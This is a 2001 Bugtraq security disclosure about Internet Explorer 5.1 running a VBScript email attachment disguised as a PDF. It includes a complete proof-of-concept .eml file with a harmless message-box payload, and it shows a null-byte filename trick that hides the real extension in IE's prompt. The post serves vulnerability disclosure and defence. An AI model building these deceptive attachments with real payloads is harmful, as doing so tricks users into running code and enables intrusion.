[19998] in bugtraq
User may be fooled to execute programs browsing with IE5.1
daemon@ATHENA.MIT.EDU (=?iso-8859-1?Q?Jes=FAs_L=F3pez_de_)
Mon Apr 2 17:35:20 2001
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Message-ID: <011401c0bbb1$28e90820$2d9551d4@servidor>
Date: Mon, 2 Apr 2001 22:11:53 +0200
Reply-To: =?iso-8859-1?Q?Jes=FAs_L=F3pez_de_Aguileta?= <aguileta@EUNATE.NET>
From: =?iso-8859-1?Q?Jes=FAs_L=F3pez_de_Aguileta?= <aguileta@EUNATE.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
Playing with Cuartangoīs recently exploit
(http://www.kriptopolis.com/cua/eml.html) I've found that itīs possible to trick
an user to execute one file making he/she think it's a data file of any kind
(pdf, mpeg,...).
This works on both NT and 2000 using IE 5.1 (other platforms/IE versions not
tested).
I have already downloaded the MS01-20 patch in the systems tested but both
appears to be not vulnerable to Cuartango's exploit (msgbox: "This update does
not need to be installed on your system"), probably because both have updated
Media Player 7 installed.
I think this is a completely different issue and excuse me if it's previously
solved/commented.
Detail:
--------8<----cut here-------8<
From: "Ripped from Juan Carlos Garcia Cuartango"
Subject: mail
Date: Thu, 2 Nov 2000 13:27:33 +0100
MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="1"
X-Priority: 3
X-MSMail-Priority: Normal
--1
Content-Type: multipart/alternative;
boundary="2"
--2
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML>
<HEAD>
</HEAD>
<BODY bgColor=3D#ffffff >
<iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
Done<br>
</BODY>
</HTML>
--2--
--1
Content-Type: application/x-shockwave-flash;
name="hola.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>
msgbox("Hello")
--1
--------8<--cut here---------8<
Making an .eml file with the above content and browsing it with IE 5, displays a
window for download or online browse the "FILE" (not program) "donthurtme.pdf".
If the user choose to online browse it, the VBscript code execute.
Another interesting issue is that, when replacing: mime 1 part with:
--1
Content-Type: application/xxxx;
name="hola.pdf%00.vbs"
Content-Transfer-Encoding: quoted-printable
Content-ID: <donthurtme.pdf>
msgbox("Hello")
--1
IE truncate in the popup window the name displaying "hola.pdf" instead of
"hola.pdf%00.vbs", making the user thinks that the extension of the program is
different. Notice that in this second case, IE properly ask for "Run this
PROGRAM" or "Save this PROGRAM", only the extension may confuse the user.
Regards and excuse my poor English.
Jesus Lopez de Aguileta
